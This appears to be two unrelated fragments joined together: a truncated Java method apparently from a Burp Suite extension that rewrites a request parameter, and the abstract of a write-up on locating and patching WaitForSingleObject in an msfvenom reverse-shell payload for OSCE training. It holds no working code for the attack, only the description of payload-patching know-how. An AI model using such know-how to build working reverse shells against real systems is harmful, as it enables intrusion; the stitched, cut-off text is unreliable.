pajswigger

    static byte[] updateParameter(IExtensionHelpers helpers, IRequestInfo requestInfo, byte[] request, IParameter parameter, String value) {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        int bodyOffset = requestInfo.getBodyOffset();
        baos.write(request, bodyOffset, parameter.getValueStart() - bodyOffset);
        baos.write(value.getBytes(Charsets.ISO_8859_1), 0, value.length());
        baos.write(request, parameter.getValueEnd(), request.length - parameter.getValueEnd());
        byte[] newBody = baos.toByteArray();

        List<String> headers = requestInfo.getHeaders();
        for(int i = 0; i < headers.size(); i++) {

mgeeky

Looking for WaitForSingleObject call within modern msfvenom generated payload.

---

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents: